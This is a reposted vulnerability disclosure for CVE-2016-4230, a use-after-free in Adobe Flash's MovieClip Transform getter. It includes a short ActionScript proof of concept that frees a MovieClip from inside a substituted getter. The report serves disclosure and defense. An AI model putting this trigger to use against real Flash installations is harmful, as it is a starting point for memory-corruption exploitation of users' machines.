###########################

# Adobe Flash MovieClip Transform Use-After-Free Vulnerability

###########################

Adobe Flash: User-after-free in MovieClip Transform getter - 

CVE-2016-4230


There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var tf = flash.geom.Transform;
var g = flash.geom;
g.addProperty("Transform", func, func);
mc.f = ASnative(900, 419);
mc.f();

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap
	}


<b>This bug is subject to a 90 day disclosure deadline. If 90 days elapse</b>
<b>without a broadly available patch, then the bug report will automatically</b>
<b>become visible to the public.</b>




Found by: natashenka



###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-08-30]

###########################